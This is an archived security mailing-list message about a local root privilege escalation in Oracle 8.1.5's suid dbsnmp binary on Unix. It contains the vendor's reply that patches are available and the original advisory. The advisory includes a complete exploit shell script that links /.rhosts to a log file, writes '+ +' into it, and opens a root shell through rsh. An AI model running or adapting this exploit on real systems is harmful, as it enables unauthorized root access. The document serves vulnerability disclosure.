Hi Brock Your note concerning a possible security vulnerability in Oracle (text below) was forwarded to me. This vulnerability has indeed been diagnosed and fixed already. Here is the scoop on where you can obtain fixes: SUPPORTED CUSTOMERS: The alert and 5 patches are posted on metalink: - URL: http://metalink.oracle.com/ UNSUPPORTED CUSTOMERS: The alert and 5 patches are posted on OTN: - URL: http://technet.oracle.com/ This was also issued as an ISS alert. Regarding your comment about reporting these issues to Oracle, we do have an internal process in place for expediting the way we handle potential security vulnerabilities, but we believe it's best to have all potential bugs come through Oracle World Wide Support first, after which they are diagnosed, and expedited as required. Thank you for your interest in Oracle and security. Yours very truly, Mary Ann Davidson ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mary Ann Davidson Group Product Manager, Security Server Technologies Oracle Corporation (650) 506 5464 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ No ka moana ku'u mele; no na halu au e hula ai. "From the ocean comes my song; of the waves I dance my dance." ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ OVERVIEW A vulnerability exists in Oracle 8.1.5 for UN*X which may allow any user to obtain root privileges. BACKGROUND My testing was done with Oracle 8.1.5 on Solaris 2.6 SPARC edition. This shouldn't make any difference, however, and I would consider any UNIX Oracle implementation to be exploitable. DETAILS When run without ORACLE_HOME being set, dbsnmp (suid root/sgid dba by default) will dump two log files out into pwd, dbsnmpc and dbsnmpt . If these files do not exist, dbsnmpd will attempt to create them mode 666 and dump around 400 bytes of uncontrolable output into them. If the files do exist, dbsnmp will append these 400 bytes but not change the permissions. Thus if root does not have an .rhosts file, we can obtain root privs by creating a symlink from /tmp/dbsnmpc to /.rhosts. One thing to note about the exploit is that on my particular implementation, a normal user does not have read access above /product/ in the Oracle path (something like /u01/app/oracle/product/8.1.5/bin/dbsnmp). This won't prevent you from running the exploit since the execute bit is set for world on all of Oracle's directories, but you may have to guess about the location of dbsnmp. This can usually done by examining the process list for Oracle entries. EDITORIAL One small rant about Oracle is their ridiculously complicated bug reporting scheme, which asks you 2814 questions and allows you ONE line of text to explain your problem. In this day and age, I don't understand why every major software vendor doesn't have something as simple as a mailto securityat_private SOMEWHERE on their site. In fact, when I searched Oracle's web page, I got zero hits on the word "security". Perhaps this address does exist and a bugtraq reader would care to enlighten me. EXPLOIT oracle8% uname -a; id SunOS oracle8 5.6 Generic_105181-05 sun4u sparc SUNW,Ultra-5_10 uid=102(btellier) gid=10(staff) oracle8% /tmp/oracle.sh couldn't read file "/config/nmiconf.tcl": no such file or directory Failed to initialize nl component,error=462 Failed to initialize nl component,error=462 # --- oracle.sh --- #!/bin/sh # Exploit for Oracle 8.1.5 on Solaris 2.6 and probably others # You'll probably have to change your path to dbsnmp # Exploit will only work if /.rhosts does NOT exist # # Brock Tellier btellierat_private cd /tmp unset ORACLE_HOME umask 0000 ln -s /.rhosts /tmp/dbsnmpc.log /u01/app/oracle/product/8.1.5/bin/dbsnmp echo "+ +" > /.rhosts rsh -l root localhost 'sh -i' rsh -l root localhost rm /tmp/*log* rsh -l root localhost rm /.rhosts
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:13:27 PDT